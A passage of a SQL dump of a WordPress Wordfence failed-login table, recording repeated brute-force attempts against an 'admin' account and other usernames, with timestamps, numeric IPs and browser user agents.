(101046, 1497016381.230815, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101045, 1497016380.925106, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101044, 1497016380.620797, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101043, 1497016380.315569, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101042, 1497016380.010622, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101041, 1497016379.701810, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101040, 1497016379.396739, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101039, 1497016379.091231, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101038, 1497016378.770787, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101037, 1497016378.404917, 1, 'loginFailInvalidUsername', 'eboshi_creative', 0, 136172254, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101036, 1496919772.059001, 1, 'loginFailInvalidUsername', 'outils', 0, 1601092177, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101035, 1496919194.318696, 1, 'loginFailInvalidUsername', 'venez', 0, 1566171412, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101034, 1496919191.630188, 1, 'loginFailInvalidUsername', 'objectifs', 0, 1566171412, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101033, 1496919185.448511, 1, 'loginFailInvalidUsername', 'cross', 0, 1566171412, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101032, 1496919182.658880, 1, 'loginFailInvalidUsername', 'pour', 0, 1566171412, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101031, 1496919178.452563, 1, 'loginFailInvalidUsername', 'notre', 0, 1566171412, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101030, 1496919176.579034, 1, 'loginFailInvalidUsername', 'training', 0, 1566171412, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101029, 1496919174.610165, 1, 'loginFailInvalidUsername', 'vous', 0, 1566171412, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101028, 1496919171.674676, 1, 'loginFailValidUsername', 'pablo', 3, 1566171412, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101027, 1496919169.727080, 1, 'loginFailValidUsername', 'julie', 2, 1566171412, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101026, 1496919167.777137, 1, 'loginFailValidUsername', 'admin', 1, 1566171412, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101025, 1496904688.498907, 1, 'loginFailValidUsername', 'admin', 1, 2065606982, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101024, 1496843769.925089, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101023, 1496843769.615325, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101022, 1496843769.303257, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101021, 1496843768.993924, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101020, 1496843768.685997, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101019, 1496843768.377463, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101018, 1496843768.069639, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101017, 1496843767.759059, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101016, 1496843767.450081, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101015, 1496843767.141164, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101014, 1496843766.832388, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101013, 1496843766.522076, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101012, 1496843766.212633, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101011, 1496843765.902572, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101010, 1496843765.591760, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101009, 1496843765.280997, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101008, 1496843764.972371, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101007, 1496843764.661667, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101006, 1496843764.346411, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101005, 1496831095.545210, 1, 'loginFailValidUsername', 'admin', 1, 3741061572, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(101004, 1496810935.567272, 1, 'loginFailInvalidUsername', 'notre', 0, 1109513350, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101003, 1496810373.897798, 1, 'loginFailValidUsername', 'admin', 1, 2745977144, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A'),
(101002, 1496807811.088165, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101001, 1496807810.779653, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(101000, 1496807810.470249, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100999, 1496807810.160751, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100998, 1496807809.850779, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100997, 1496807809.541822, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100996, 1496807809.232268, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100995, 1496807808.923610, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100994, 1496807808.412905, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100993, 1496807808.104560, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100992, 1496807807.794730, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100991, 1496807807.485597, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100990, 1496807807.177319, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100989, 1496807806.867869, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100988, 1496807806.555530, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100987, 1496807806.246380, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100986, 1496807805.937507, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100985, 1496807805.627731, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100984, 1496807805.295366, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100983, 1496795053.728851, 1, 'loginFailValidUsername', 'admin', 1, 1053979479, 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)'),
(100982, 1496778654.448659, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100981, 1496778654.135607, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100980, 1496778653.821324, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100979, 1496778653.503362, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100978, 1496778653.193350, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100977, 1496778652.877891, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100976, 1496778652.562726, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100975, 1496778652.250898, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100974, 1496778651.940121, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100973, 1496778651.629892, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100972, 1496778651.318493, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100971, 1496778651.007807, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100970, 1496778650.692810, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100969, 1496778650.373988, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100968, 1496778650.063988, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100967, 1496778649.752180, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100966, 1496778649.438813, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100965, 1496778649.128236, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100964, 1496778648.805996, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100963, 1496753098.344955, 1, 'loginFailValidUsername', 'admin', 1, 3132510964, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100962, 1496742261.736167, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100961, 1496742261.424426, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100960, 1496742261.112623, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100959, 1496742260.797158, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100958, 1496742260.428147, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100957, 1496742260.117584, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100956, 1496742259.800880, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100955, 1496742259.490076, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100954, 1496742259.156649, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100953, 1496742258.697910, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100952, 1496742258.387864, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100951, 1496742258.077386, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100950, 1496742257.760424, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100949, 1496742257.446352, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100948, 1496742257.134197, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100947, 1496742256.823727, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0');
INSERT INTO `www2_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(100946, 1496742256.511603, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100945, 1496742256.198350, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100944, 1496742255.883460, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100943, 1496711602.020060, 1, 'loginFailInvalidUsername', 'outils', 0, 2014968716, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100942, 1496709296.974567, 1, 'loginFailValidUsername', 'admin', 1, 3163163411, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100941, 1496708591.878705, 1, 'loginFailInvalidUsername', 'notre', 0, 1984277895, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100940, 1496707742.439463, 1, 'loginFailInvalidUsername', 'training', 0, 1109513350, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100939, 1496707740.532308, 1, 'loginFailInvalidUsername', 'vous', 0, 1109513350, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100938, 1496707738.663029, 1, 'loginFailValidUsername', 'pablo', 3, 1109513350, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100937, 1496707736.767955, 1, 'loginFailValidUsername', 'julie', 2, 1109513350, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100936, 1496707734.368431, 1, 'loginFailValidUsername', 'admin', 1, 1109513350, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100935, 1496707732.523045, 1, 'loginFailInvalidUsername', 'center', 0, 1109513350, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100934, 1496707730.728344, 1, 'loginFailInvalidUsername', 'namur', 0, 1109513350, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100933, 1496707728.922097, 1, 'loginFailInvalidUsername', 'travail', 0, 1109513350, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100932, 1496707727.118738, 1, 'loginFailInvalidUsername', 'professionnel', 0, 1109513350, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100931, 1496707725.299204, 1, 'loginFailInvalidUsername', 'outils', 0, 1109513350, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100930, 1496707085.118454, 1, 'loginFailValidUsername', 'admin', 1, 788319630, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100929, 1496685562.886583, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100928, 1496685562.542020, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100927, 1496685562.232984, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100926, 1496685561.922536, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100925, 1496685561.613747, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100924, 1496685561.304937, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100923, 1496685560.994716, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100922, 1496685560.686343, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100921, 1496685560.376230, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100920, 1496685560.068200, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100919, 1496685559.757421, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100918, 1496685559.448722, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100917, 1496685559.027818, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100916, 1496685558.718846, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100915, 1496685558.410216, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100914, 1496685558.101838, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100913, 1496685557.793170, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100912, 1496685557.485379, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100911, 1496685557.174228, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100910, 1496671032.391234, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100909, 1496671032.079949, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100908, 1496671031.770692, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100907, 1496671031.458144, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100906, 1496671031.148801, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100905, 1496671030.834937, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100904, 1496671030.521807, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100903, 1496671030.213027, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100902, 1496671029.903056, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
